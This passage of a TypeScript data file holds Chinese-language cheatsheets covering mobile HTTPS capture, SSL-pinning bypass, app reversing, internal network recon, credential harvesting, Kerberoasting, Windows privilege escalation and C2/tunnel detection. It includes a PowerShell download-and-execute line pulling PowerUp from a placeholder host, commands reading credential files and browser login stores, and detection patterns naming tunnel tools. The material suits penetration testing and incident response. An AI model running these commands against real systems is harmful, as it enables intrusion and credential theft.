      { title: "宿主机 crontab 也别漏", cmd: "# 每个 node\nfor u in $(cut -d: -f1 /etc/passwd); do sudo crontab -u $u -l 2>/dev/null | rg -v '^#\\|^$' && echo \"[$u]\"; done\nsudo cat /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* 2>/dev/null | rg -i 'curl\\|wget\\|base64'" },
      { title: "删 + 阻断出网", cmd: "kubectl delete cronjob -n <ns> <name>\n# NetworkPolicy 禁 egress\nkubectl apply -f netpol-deny-egress.yaml" },
    ],
    relatedTools: ["kubectl"],
  },
  {
    slug: "k8s-node-not-ready",
    category: "k8s",
    title: "Node NotReady / kubelet 挂",
    summary: "kubelet · runtime · CNI · 磁盘四板斧",
    tags: ["k8s", "node", "kubelet"],
    severity: "warn",
    steps: [
      { title: "看是哪一环", cmd: "kubectl describe node <node> | rg -A2 Conditions\nkubectl get node <node> -o json | jq '.status.conditions'" },
      { title: "kubelet 日志", cmd: "ssh <node> 'sudo journalctl -u kubelet -n 200 --no-pager'\nssh <node> 'sudo systemctl status kubelet'" },
      { title: "runtime（containerd / docker）", cmd: "ssh <node> 'sudo crictl ps -a | head -20'\nssh <node> 'sudo systemctl status containerd'\nssh <node> 'sudo journalctl -u containerd -n 100 --no-pager'" },
      { title: "CNI 网络", cmd: "kubectl get pod -n kube-system -o wide | rg 'calico\\|flannel\\|cilium'\nssh <node> 'ip -br a; ip route; ls /etc/cni/net.d/'\nssh <node> 'sudo journalctl -u calico-node -n 100 --no-pager' # 举例" },
      { title: "磁盘 / inode 打满", cmd: "ssh <node> 'df -h; df -i'\nssh <node> 'du -sh /var/lib/containerd /var/lib/kubelet /var/log 2>/dev/null'" },
      { title: "拉起来", cmd: "ssh <node> 'sudo systemctl restart containerd && sudo systemctl restart kubelet'\nkubectl uncordon <node>" },
    ],
    relatedTools: ["kubectl"],
  },

  // ─────────────────── iOS / Android 抓包与逆向 ───────────────────
  {
    slug: "android-https-capture",
    category: "mobile",
    title: "Android HTTPS 抓包（含 SSL Pinning 绕过）",
    summary: "证书信任 → Frida 脱 Pin → mitmproxy 落包",
    tags: ["android", "抓包", "frida", "mitm"],
    severity: "info",
    steps: [
      { title: "起 mitmproxy 代理", cmd: "mitmproxy -p 8080 --set block_global=false\n# 或 web UI\nmitmweb -p 8080 --web-host 0.0.0.0", tool: "mitmproxy" },
      { title: "手机走代理", cmd: "# WiFi → 高级 → 代理 → 手动 → PC-IP:8080\n# 装 CA：http://mitm.it → Android 证书" },
      { title: "Android 7+ 用户证书不认，得进系统证书", cmd: "# root 手机\nopenssl x509 -inform PEM -subject_hash_old -in ~/.mitmproxy/mitmproxy-ca-cert.pem | head -1\ncp ~/.mitmproxy/mitmproxy-ca-cert.pem <hash>.0\nadb push <hash>.0 /sdcard/\nadb shell 'su -c \"mount -o rw,remount /system && cp /sdcard/<hash>.0 /system/etc/security/cacerts/ && chmod 644 /system/etc/security/cacerts/<hash>.0\"'" },
      { title: "无 root：用 objection patch APK", cmd: "apktool d target.apk -o out\n# 加 network_security_config.xml 信任 user CA\nobjection patchapk -s target.apk\nadb install target.objection.apk", tool: "objection" },
      { title: "SSL Pinning 用 Frida 绕", cmd: "adb push frida-server /data/local/tmp/\nadb shell 'su -c \"chmod +x /data/local/tmp/frida-server && /data/local/tmp/frida-server &\"'\nfrida -U -f com.target.app -l frida-scripts/multi-unpinner.js --no-pause", tool: "frida" },
      { title: "还不通？okhttp / Flutter / Xamarin 特化脚本", cmd: "# okhttp\nfrida -U -f <pkg> -l okhttp3-pinning-bypass.js\n# Flutter（走底层 BoringSSL）\nfrida -U -f <pkg> -l disable-flutter-tls.js" },
    ],
    relatedTools: ["mitmproxy", "frida", "objection"],
  },
  {
    slug: "ios-https-capture",
    category: "mobile",
    title: "iOS HTTPS 抓包（越狱 / 非越狱两条路）",
    summary: "非越狱走 mitm CA 信任 · 越狱用 SSL Kill Switch",
    tags: ["ios", "抓包", "pinning"],
    severity: "info",
    steps: [
      { title: "起 mitmproxy 并把 CA 装进 iOS", cmd: "mitmproxy -p 8080\n# 手机 Safari 打开 http://mitm.it 装描述文件\n# 设置 → 通用 → VPN 与设备管理 → 安装描述文件\n# 设置 → 通用 → 关于本机 → 证书信任设置 → 打开 mitmproxy" },
      { title: "手机连代理", cmd: "# WiFi → 详情 → HTTP 代理 → 手动 → PC-IP:8080" },
      { title: "越狱：SSL Kill Switch 2 一劳永逸", cmd: "# Cydia / Sileo 装 SSL Kill Switch 2\n# 设置 → SSL Kill Switch 2 → Disable Certificate Validation → ON" },
      { title: "非越狱 + SSL Pinning：走 Frida", cmd: "# 用 iOS 版 frida（需 SSH）\nfrida -U -f com.target.app -l ios-ssl-kill-switch.js --no-pause", tool: "frida" },
      { title: "看 App 的抓包对策（TrustKit / NSPinning）", cmd: "# 越狱机砸壳\ndumpdecrypted 或 frida-ios-dump\notool -L <app> | rg -i 'TrustKit\\|SSL'\nclass-dump <app>.app/<app> | rg -i 'pinning\\|trust'" },
      { title: "USB 抓 rvictl（不越狱看全流量）", cmd: "# Mac 上\nrvictl -s <iOS-UDID>\nsudo tcpdump -i rvi0 -s0 -w ios.pcap host <target>" },
    ],
    relatedTools: ["mitmproxy", "frida"],
  },
  {
    slug: "android-static-reverse",
    category: "mobile",
    title: "Android APK 静态逆向",
    summary: "拆包 → 反编 → 找加密 / 硬编 key / 反调试",
    tags: ["android", "逆向", "静态"],
    severity: "info",
    steps: [
      { title: "拆 APK", cmd: "apktool d target.apk -o out/\nunzip -o target.apk -d out-raw/\n# 看 manifest\nrg -n 'exported\\|permission\\|scheme' out/AndroidManifest.xml" },
      { title: "反编 Java", cmd: "# dex → jar\nd2j-dex2jar target.apk -o target.jar\n# jadx 一把梭\njadx target.apk -d jadx-out/\njadx-gui target.apk" },
      { title: "全局搜硬编 key / URL / 秘钥", cmd: "rg -n --hidden 'AKIA[0-9A-Z]{16}\\|sk-[a-zA-Z0-9]{20,}\\|-----BEGIN' jadx-out/\nrg -n 'https?://' jadx-out/ | rg -v '(schemas\\.\\|w3\\.org)' | head -50" },
      { title: "看 native so", cmd: "ls out/lib/\nreadelf -d out/lib/arm64-v8a/libnative.so | head\nstrings out/lib/arm64-v8a/libnative.so | rg -i 'key\\|token\\|url'\n# Ghidra / IDA 打开做反编" },
      { title: "找反调试 / root 检测", cmd: "rg -in 'RootBeer\\|isDeviceRooted\\|/su\\|magisk\\|frida\\|ro.debuggable' jadx-out/" },
    ],
    relatedTools: ["jadx"],
  },
  {
    slug: "android-frida-dynamic",
    category: "mobile",
    title: "Frida 动态 hook（改逻辑 / 抓参数）",
    summary: "起 server → attach → hook Java / native",
    tags: ["android", "frida", "动态"],
    severity: "info",
    steps: [
      { title: "配 frida-server", cmd: "# 装对架构\nadb shell getprop ro.product.cpu.abi\nadb push frida-server-arm64 /data/local/tmp/frida-server\nadb shell 'su -c \"chmod +x /data/local/tmp/frida-server && /data/local/tmp/frida-server -l 0.0.0.0:27042 &\"'\nfrida-ps -U | head", tool: "frida" },
      { title: "attach 目标", cmd: "frida -U -f com.target.app --no-pause -l hook.js\n# 或 spawn 已运行的\nfrida -U -n com.target.app -l hook.js" },
      { title: "hook Java 抓函数参数", cmd: "cat > hook.js <<'JS'\nJava.perform(function () {\n  var C = Java.use('com.target.crypto.Signer');\n  C.sign.implementation = function (data, key) {\n    console.log('sign() called len=' + data.length + ' key=' + key);\n    var r = this.sign(data, key);\n    console.log('  -> ' + r);\n    return r;\n  };\n});\nJS" },
      { title: "hook native 函数", cmd: "cat > native.js <<'JS'\nvar addr = Module.findExportByName('libnative.so', 'do_sign');\nInterceptor.attach(addr, {\n  onEnter: function (a) { console.log('do_sign(', a[0].readUtf8String(), ')'); },\n  onLeave: function (r) { console.log('  = ', r.readUtf8String()); },\n});\nJS" },
      { title: "objection 免脚本一把梭", cmd: "objection -g com.target.app explore\n# 进交互后\nandroid hooking search classes crypto\nandroid hooking watch class 'com.target.Signer'\nandroid sslpinning disable", tool: "objection" },
    ],
    relatedTools: ["frida", "objection"],
  },
  {
    slug: "ios-decrypt-ipa",
    category: "mobile",
    title: "iOS 砸壳 / 脱 IPA 加密",
    summary: "越狱机 dump 解密 IPA · 供后续 class-dump",
    tags: ["ios", "砸壳", "越狱"],
    severity: "info",
    steps: [
      { title: "确认设备状态", cmd: "iproxy 2222 22 &\nssh -p 2222 root@127.0.0.1  # 默认密码 alpine（改掉！）\nuname -a\napt list --installed 2>/dev/null | rg -i 'frida\\|cycript'" },
      { title: "frida-ios-dump（推荐）", cmd: "git clone https://github.com/AloneMonkey/frida-ios-dump\ncd frida-ios-dump\npip3 install -r requirements.txt\n./dump.py com.target.app  # 或 应用中文名" },
      { title: "查砸壳成功", cmd: "otool -l target.decrypted | rg -A4 LC_ENCRYPTION_INFO\n# cryptid 应为 0" },
      { title: "class-dump 拉 header", cmd: "class-dump -H target.decrypted -o headers/\nrg -n 'password\\|token\\|encrypt' headers/ | head -30" },
      { title: "IPA 打包备用", cmd: "mkdir Payload && cp -r target.app Payload/\nzip -r target-decrypted.ipa Payload/" },
    ],
    relatedTools: ["frida"],
  },

  // ─────────────────── 内网横向排查 ───────────────────
  {
    slug: "internal-net-recon",
    category: "lateral",
    title: "拿到跳板机后的内网探测",
    summary: "快速摸清段 · 开放端口 · Web / DB 资产",
    tags: ["内网", "扫段", "recon"],
    severity: "warn",
    steps: [
      { title: "先摸自己", cmd: "ip -br a; ip route; cat /etc/resolv.conf\narp -an | head -20\ncat /etc/hosts" },
      { title: "扫存活主机（ICMP + TCP fallback）", cmd: "# fping 快\nfping -a -q -g 10.0.0.0/24 2>/dev/null\n# 静默场景用 tcp 探测\nnmap -sn -PS22,80,443,3389,445 10.0.0.0/24", tool: "nmap" },
      { title: "常见高价值端口扫", cmd: "nmap -Pn -n --open -T4 -p 22,80,443,445,3306,3389,5432,6379,8080,8443,9200,27017 10.0.0.0/24 -oA lan-scan" },
      { title: "Web 资产画像", cmd: "cat lan-scan.gnmap | rg 'Ports:' | awk '{print $2}' | while read ip; do\n  for p in 80 443 8080 8443; do\n    curl -sk -m 3 -o /dev/null -w \"%{http_code} %{url_effective} %{redirect_url}\\n\" http://$ip:$p/\n  done\ndone" },
      { title: "看域内 / 主机名", cmd: "# smb 拿主机名\nnbtscan 10.0.0.0/24\n# 反向 DNS\nfor i in $(seq 1 254); do host 10.0.0.$i 2>/dev/null | rg 'domain name pointer'; done" },
    ],
    relatedTools: ["nmap", "masscan"],
  },
  {
    slug: "credential-hunt",
    category: "lateral",
    title: "内网凭据 / secret 收割",
    summary: "配置文件 / bash_history / 内存 / 浏览器",
    tags: ["凭据", "hunt", "内网"],
    severity: "danger",
    steps: [
      { title: "本机敏感文件", cmd: "sudo rg -n --hidden -uu '(password|passwd|secret|api[_-]?key|token|AKIA[0-9A-Z]{16})\\s*[:=]' /etc /root /home 2>/dev/null | head -80\nfind / -name '*.kdbx' -o -name '*.pfx' -o -name 'id_rsa*' -o -name '.aws' -o -name '.kube' 2>/dev/null" },
      { title: "history / lastlog", cmd: "cat ~/.bash_history ~/.zsh_history 2>/dev/null | rg -i 'passwd\\|token\\|curl.*-u\\|sshpass\\|mysql.*-p'\nsudo cat /root/.bash_history 2>/dev/null | rg -i 'passwd\\|token'" },
      { title: "SSH known_hosts / config（横向目标）", cmd: "cat ~/.ssh/known_hosts ~/.ssh/config 2>/dev/null\n# 谁登过来\nlast -F | head -20\ncat /var/log/wtmp | last -f - | head" },
      { title: "SSHD / sudo 曾输入密码", cmd: "# 有些环境走 pam 记明文（合规问题）\nsudo rg -n '(pam_userdb|pam_python)' /etc/pam.d/\nsudo journalctl -u sshd | rg -i 'accepted\\|failed'" },
      { title: "浏览器 / 配置软件", cmd: "# 服务器上一般没有，但跳板机偶尔有\nfind / -name 'Login Data' 2>/dev/null\nfind / -name 'logins.json' 2>/dev/null  # firefox\nfind / -path '*/.config/rclone/rclone.conf' -o -path '*/.git-credentials' 2>/dev/null" },
      { title: "内存里抓（老机器）", cmd: "# Linux 上 mimipenguin\ngit clone https://github.com/huntergregal/mimipenguin && cd mimipenguin && sudo ./mimipenguin.sh" },
    ],
    relatedTools: ["gitleaks"],
  },
  {
    slug: "smb-relay-attack",
    category: "lateral",
    title: "SMB 中继 / NTLM 抓包应对",
    summary: "被打 relay 的迹象 · SMB signing / EPA 收敛",
    tags: ["smb", "ntlm", "relay"],
    severity: "danger",
    steps: [
      { title: "找哪些主机没开 SMB signing（易被 relay）", cmd: "# Impacket 里的 smbmap 也行\ncrackmapexec smb 10.0.0.0/24 --gen-relay-list relay-targets.txt\ncat relay-targets.txt" },
      { title: "看是否有异常 responder / mitm6", cmd: "# 网关 / 交换机镜像口抓\nsudo tcpdump -i eth0 -nn 'port 5355 or port 137 or port 138 or port 5353 or udp port 547' -w llmnr.pcap\n# Windows 端：确认 LLMNR / NBT-NS / mDNS 是否被回应" },
      { title: "AD 侧看谁在打", cmd: "# 域控查 event 4624 类型 3 + NTLM V1 认证\nGet-WinEvent -FilterHashtable @{LogName='Security';Id=4624} -MaxEvents 500 |\n  Where-Object { $_.Properties[10].Value -like '*NTLM*' } |\n  Format-Table TimeCreated,@{n='src';e={$_.Properties[19].Value}},@{n='user';e={$_.Properties[5].Value}}" },
      { title: "止血：SMB signing + LDAP signing + EPA", cmd: "# GPO / 注册表\nComputer Config > Windows Settings > Security > Local Policies > Security Options:\n  Microsoft network client: Digitally sign communications (always) = Enabled\n  Microsoft network server: Digitally sign communications (always) = Enabled\n# LDAP\n  Domain controller: LDAP server signing requirements = Require signing\n# EPA (Extended Protection for Authentication) 打开" },
      { title: "禁 LLMNR / NBT-NS（源头）", cmd: "# LLMNR\nComputer Config > Admin Templates > Network > DNS Client > Turn off multicast name resolution = Enabled\n# NBT-NS：网卡 → IPv4 → 高级 → WINS → 禁用 NetBIOS" },
    ],
    relatedTools: [],
  },
  {
    slug: "reverse-tunnel-detect",
    category: "lateral",
    title: "反向隧道 / C2 出网检测",
    summary: "找非常规长连接 · 定位 ssh -R / frp / chisel",
    tags: ["c2", "隧道", "出网"],
    severity: "danger",
    steps: [
      { title: "看主机所有 ESTABLISHED 长连接", cmd: "ss -tnp state established | awk '{print $4, $5, $6}' | sort -u\n# 按远端 IP 归并\nss -tnp state established | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn | head" },
      { title: "过陌生进程的 socket", cmd: "for pid in $(ps -eo pid --no-headers); do\n  cmd=$(cat /proc/$pid/comm 2>/dev/null)\n  case $cmd in sshd|nginx|systemd*|kubelet|containerd|dockerd|chrome|firefox) continue;; esac\n  ss -tnp 2>/dev/null | rg \"pid=$pid,\" && echo \"^ $pid $cmd\"\ndone | head -40" },
      { title: "看 ssh -R / autossh 反向端口", cmd: "sudo ss -tlnp | rg sshd\nps -ef | rg -i 'ssh .*-R\\|autossh\\|frpc\\|frps\\|chisel\\|ngrok\\|nps\\|revsocks\\|gost'" },
      { title: "DNS 隧道迹象", cmd: "# 出口 DNS 请求量突增 / 长子域名\nsudo tcpdump -i any -nn -s0 port 53 -w dns.pcap -c 5000\ntshark -r dns.pcap -T fields -e dns.qry.name | awk '{print length, $0}' | sort -rn | head -20" },
      { title: "边界侧封 + 主机侧清", cmd: "# 边界防火墙禁出向到 IP\niptables -I OUTPUT -d <c2-ip> -j DROP\n# 主机清\nsudo kill -9 <pid>; sudo systemctl stop <bad-svc>\nsudo find / -newer /tmp -type f 2>/dev/null | rg -v '/proc\\|/sys' | head" },
    ],
    relatedTools: [],
  },
  {
    slug: "windows-privilege-escalation",
    category: "lateral",
    title: "Windows / AD 提权路径排查",
    summary: "本机弱配置 + 域内 Kerberos 漏洞 + GPO",
    tags: ["windows", "提权", "ad"],
    severity: "warn",
    steps: [
      { title: "本机跑 winPEAS / PowerUp", cmd: "# 上传 winPEASx64.exe\n.\\winPEASx64.exe > peas.txt\npowershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://<lhost>/PowerUp.ps1'); Invoke-AllChecks\"" },
      { title: "服务弱权限 / unquoted path", cmd: "# 找可写服务\naccesschk.exe -uwcqv \"Authenticated Users\" *\n# unquoted service path\nwmic service get name,pathname,displayname,startmode |findstr /i \"Auto\" |findstr /i /v \"C:\\Windows\\\\\" |findstr /i /v \"\\\"\"" },
      { title: "AD Kerberos：Kerberoast / AS-REP", cmd: "# 域内任意用户可跑\nRubeus.exe kerberoast /outfile:hashes.txt\nRubeus.exe asreproast /outfile:asrep.txt\nhashcat -m 13100 hashes.txt wordlist.txt   # Kerberoast\nhashcat -m 18200 asrep.txt wordlist.txt    # AS-REP" },
      { title: "BloodHound 找攻击路径", cmd: "# 采集\nSharpHound.exe -c All\n# 导入 BloodHound GUI，查 shortest path to Domain Admins", tool: "bloodhound" },
      { title: "GPO / ACL 危险配置", cmd: "# 谁能改 GPO\nGet-DomainGPO | Get-ObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match 'Write|GenericAll' }\n# 域用户能加 computer（默认 10）\nGet-DomainObject -Identity 'DC=corp,DC=local' | select ms-DS-MachineAccountQuota" },
      { title: "打补丁 + 缩权", cmd: "# ZeroLogon / PetitPotam / PrintNightmare 全打\nGet-HotFix | rg 'KB50\\|KB51\\|KB52'\n# SPN 大清扫（业务账户禁 pre-auth 关掉）\nGet-ADUser -Filter 'ServicePrincipalName -like \"*\"' -Properties ServicePrincipalName,PasswordLastSet" },
    ],
    relatedTools: ["bloodhound"],
  },
];

// helpers
export const casesByCategory = (cat: CaseCategory) => cheatsheets.filter((c) => c.category === cat);
export const cheatBySlug = (slug: string) => cheatsheets.find((c) => c.slug === slug);
